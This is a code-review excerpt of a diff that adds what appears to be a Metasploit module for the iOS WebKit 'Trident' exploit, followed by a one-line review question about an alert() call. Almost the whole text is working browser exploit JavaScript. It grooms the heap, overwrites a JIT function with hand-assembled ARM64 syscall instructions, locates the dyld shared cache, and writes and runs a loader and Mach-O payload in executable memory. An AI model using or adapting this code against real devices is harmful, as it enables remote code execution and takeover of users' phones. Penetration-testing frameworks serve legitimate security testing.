modules/exploits/apple_ios/browser/webkit_trident.rb

```diff
@@ -0,0 +1,299 @@
+  shll[i / 4] = word;
+  i += 4;
+ }
+ _dview = null;
+ function u2d(low, hi) {
+  if (!_dview) _dview = new DataView(new ArrayBuffer(16));
+  _dview.setUint32(0, hi);
+  _dview.setUint32(4, low);
+  return _dview.getFloat64(0);
+ }
+ var pressure = new Array(100);
+ var bufs = new Array(10000);
+ dgc = function() {
+  for (var i = 0; i < pressure.length; i++) {
+   pressure[i] = new Uint32Array(0x10000);
+  }
+  for (var i = 0; i < pressure.length; i++) {
+   pressure[i] = 0;
+  }
+ }
+
+ function swag() {
+  if (bufs[0]) return;
+  for (var i = 0; i < 4; i++) {
+    dgc();
+  }
+  for (i = 0; i < bufs.length; i++) {
+   bufs[i] = new Uint32Array(0x100 * 2)
+   for (k = 0; k < bufs[i].length;) {
+    bufs[i][k++] = 0x41414141;
+    bufs[i][k++] = 0xffff0000;
+   }
+  }
+ }
+ var trycatch = "";
+ for (var z = 0; z < 0x2000; z++) trycatch += "try{} catch(e){}; ";
+ var fc = new Function(trycatch);
+ var fcp = 0;
+ var smsh = new Uint32Array(0x10)
+
+ function smashed(stl) {
+  document.body.innerHTML = "";
+  var jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]);
+  write4(jitf, 0xd28024d0);         //movz x16, 0x126
+  write4(jitf + 4, 0x58000060);     //ldr x0, 0x100007ee4
+  write4(jitf + 8, 0xd4001001);     //svc 80
+  write4(jitf + 12, 0xd65f03c0);    //ret
+  write4(jitf + 16, jitf + 0x20);
+  write4(jitf + 20, 1);
+  fc();
+  var dyncache = read4(jitf + 0x20);
+  var dyncachev = read4(jitf + 0x20);
+  var go = 1;
+  while (go) {
+   if (read4(dyncache) == 0xfeedfacf) {
+    for (i = 0; i < 0x1000 / 4; i++) {
+     if (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever
+     {
+      go = 0;
+      break;
+     }
+    }
+   }
+   dyncache += 0x1000;
+  }
+  dyncache -= 0x1000;
+  var bss = [];
+  var bss_size = [];
+  for (i = 0; i < 0x1000 / 4; i++) {
+   if (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) {
+    bss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000);
+    bss_size.push(read4(dyncache + i * 4 + (0x28)));
+   }
+  }
+  var shc = jitf;
+  var filestream = load_binary_resource("loader")
+  for (var i = 0; i < filestream.length;) {
+   var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
+   write4(shc, word);
+   shc += 4;
+   i += 4;
+  }
+  jitf &= ~0x3FFF;
+  jitf += 0x8000;
+  write4(shc, jitf);
+  write4(shc + 4, 1);
+  // copy macho
+  for (var i = 0; i < shll.length; i++) {
+   write4(jitf + i * 4, shll[i]);
+  }
+  for (var i = 0; i < bss.length; i++) {
+   for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) {
+    write4(bss[i] + k * 4, 0);
+   }
+  }
+  fc();
+  alert(2);
```

Comment:
Is `alert()` necessary ?

Reply:
I think not, it was useful for debugging